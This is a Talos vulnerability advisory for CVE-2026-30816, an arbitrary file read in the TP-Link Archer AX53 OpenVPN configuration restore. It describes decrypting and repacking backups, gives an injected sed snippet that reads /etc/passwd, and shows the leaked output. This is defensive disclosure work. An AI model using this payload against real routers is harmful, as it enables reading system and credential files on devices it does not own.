Talos Vulnerability Report

TALOS-2025-2304

Tp-Link Archer AX53 v1.0 configuration restore crt.sed vulnerability

May 7, 2026

CVE Number

CVE-2026-30816

SUMMARY

An external config control vulnerability exists in the Openvpn configuration restore crt.sed functionality of Tp-Link Archer AX53 v1.0 1.3.1 Build 20241120 rel.54901(5553). A specially crafted configuration value can lead to arbitrary file reading. An attacker can upload a malicious file to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Tp-Link Archer AX53 v1.0 1.3.1 Build 20241120 rel.54901(5553)

PRODUCT URLS

Archer AX53 v1.0 - https://www.tp-link.com/my/support/download/archer-ax53/

CVSSv3 SCORE

6.8 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

CWE

CWE-73 - External Control of File Name or Path

DETAILS

The TP-Link Archer AX53 AX3000 Dual Band Gigabit Wi-Fi 6 Router is currently among the most popular routers sold online, and boasts impressive gigabit speeds for the price. This router also features remote cloud access via the TP-Link HomeShield application and smart home functionality.

A long existing feature of TP-Link routers and most routers in general is the ability to backup the router configuration into a file which can then be reuploaded to the device to restore the router to a particular operational state. On the TP-Link AX3000, this functionality is accessed via the Web GUI by navigating to the ‘Advanced > System’ menu. Upon hitting the ‘Back Up’ button, the browser will download a file called ArcherAX53v120241120131n.bin. As described in a previously disclosed vulnerability on an older model of TP-Link routers https://github.com/aaronsvk/CVE-2022-30075 , this binary blob must first be decrypted with a static AES key and IV, then unpacked as a GZIP archive. After this, one must unpack the resulting tar file to get two resulting files: ori-backup-user-config.bin and ori-backup-certificate.bin with actual contents. We then unpack these two files in the same exact manner, first decrypting with the same AES key and IV and unpacking decrypted binary as a gzip file. For ori-backup-user-config.bin we end up with a config.xml file that is human readable. This configuration xml can be editied and then repacked with a reverse of the process to manually change the configuration of the device.

If we focus on the ori-backup-certificate.bin file, we can decrypt this file and then unpack this binary as a gzip file, we’re left with a tar archive that we can unpack to see the following files:

-rw-------  1261 2025-08-05 13:00 ./ca.crt
-rw-r--r--  144 2025-08-05 13:00 ./client.conf
-rw-------  3707 2025-08-05 13:00 ./client.crt
-rw-------  916 2025-08-05 13:00 ./client.key
-rw-------  245 2025-08-05 13:00 ./dh1024.pem
-rw-------  3725 2025-08-05 13:00 ./server.crt
-rw-------  916 2025-08-05 13:00 ./server.key

Those with VPN knowledge will probably recognize this as common files utilized by openvpn, and we can find this same exact directory layout inside of /etc/openvpn/ on the device. And if one includes arbitrary files inside of this unpacked tarball and repacks eerything back up correctly, we can actually see our updated or new files included inside of /etc/openvpn on the device. Curiously if we examine this directory on the device, we see an extra file:

-rw-------    1 admin    1000          1261 Aug  6  2025 ca.crt
-rw-r--r--    1 admin    1000          4038 Nov 20 00:03 client.conf
-rw-------    1 admin    1000          3707 Aug  6  2025 client.crt
-rw-------    1 admin    1000           916 Aug  6  2025 client.key
-rw-rw-r--    1 admin    1000           311 Dec  2  2025 crt.sed     // [1]
-rw-------    1 admin    1000           245 Aug  6  2025 dh1024.pem
-rw-------    1 admin    1000          3725 Aug  6  2025 server.crt
-rw-------    1 admin    1000           916 Aug  6  2025 server.key

At [1] we see a crt.sed file that gets left out of the backed up openvpn config, the contents of which are such:

:begin
/Certificate:/,/-----BEGIN CERTIFICATE/ {
        /-----BEGIN CERTIFICATE/! {
                $! {
                        N;
                        b begin
                }
        }
        s/Certificate.*-----BEGIN CERTIFICATE/-----BEGIN CERTIFICATE/;
}

This file immediately appears to be a sed file used somehow in the openvpn functionality. If we grep for crt.sed on the filesystem, we find it within ./usr/sbin/build-ovpn-crt, at the following area therein:

client_config()
{
    // [...]
    config_load openvpn
    config_get dev "$secname" dev
    config_get proto "$secname" proto
    config_get port "$secname" port
    config_get cipher "$secname" cipher
    config_get persist_key "$secname" persist_key
    config_get auth_user_pass "$secname" auth_user_pass_verify

    : > $clnt_conf
    append_param "$clnt_conf" "client"
    append_param "$clnt_conf" "dev $dev"
    append_param "$clnt_conf" "proto $proto"
    append_param "$clnt_conf" "float"
    append_param "$clnt_conf" "nobind"
    append_param "$clnt_conf" "cipher $cipher"
    append_param "$clnt_conf" "comp-lzo adaptive"
    append_param "$clnt_conf" "resolv-retry infinite"
    append_param "$clnt_conf" "remote-cert-tls $secname"

      // [...]
  
    # root certificate
    echo "<ca>" >> $clnt_conf
    cat $OPENVPN_DIR/ca.crt >> $clnt_conf
    echo "</ca>" >> $clnt_conf
    # client certificate 
    echo "<cert>" >> $clnt_conf
    sed -f $OPENVPN_DIR/crt.sed $OPENVPN_DIR/client.crt >> $clnt_conf  // [2]
    echo "</cert>" >> $clnt_conf
    # client private key
    echo "<key>" >> $clnt_conf
    cat $OPENVPN_DIR/client.key >> $clnt_conf
    echo "</key>" >> $clnt_conf
}

At [2] we can clearly see that this file gets treated as a sed script that is run to help generate a client certificate for the user when they want to connect to the openvpn server. This ./usr/sbin/build-ovpn-crt can be run via the Web GUI interface by hitting the ‘Advanced > VPN Server > OpenVPN > EXPORT’ button. With that all in mind, the question becomes “What can I do with this?”. Since the busybox binary on the router does not have GNU extensions enabled, we cannot run arbitrary commands, but with a little knowledge of sed scripting, we modify the sed script by adding something like the following:

/----END CERTIFICATE/{
  r /etc/passwd
  p
}

The above lines will cause /etc/passwd to be read into the buffer and printed out, but any amount of arbitrary files can also be added to allow for reading of any file on the file system into the output client openvpn configuration:

client
dev tun
proto tcp
float
nobind
cipher AES-128-CBC
comp-lzo adaptive
resolv-retry infinite
remote-cert-tls server
persist-key
remote 1194
<ca>
-----BEGIN CERTIFICATE-----
// [...]
-----END CERTIFICATE-----
</ca>

<cert>
-----BEGIN CERTIFICATE-----
// [...]
-----END CERTIFICATE-----
-----END CERTIFICATE-----
root:x:0:0:root:/root:/bin/ash
sftpadmin:x:1001:0:sftpadmin:/var:/bin/false
visit::2001:65534:visit:/var:/bin/false
daemon:*:1:1:daemon:/var:/bin/false
    ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
admin:x:1000:0:admin:/var:/bin/false
guest::2000:65534:guest:/var:/bin/false
</cert>
<key>
-----BEGIN PRIVATE KEY-----
// [...]
-----END PRIVATE KEY-----
</key>

VENDOR RESPONSE

Vendor advisory: https://www.tp-link.com/us/support/faq/5055/

TIMELINE

2026-01-12 - Vendor Disclosure
2026-04-08 - Vendor Patch Release
2026-05-07 - Public Release

Credit

Discovered by Lilith >_> of Cisco Talos.

TALOS-2025-2303

TALOS-2025-2305

Intelligence Center

Vulnerability Research

Incident Response

Security Resources

Media

Company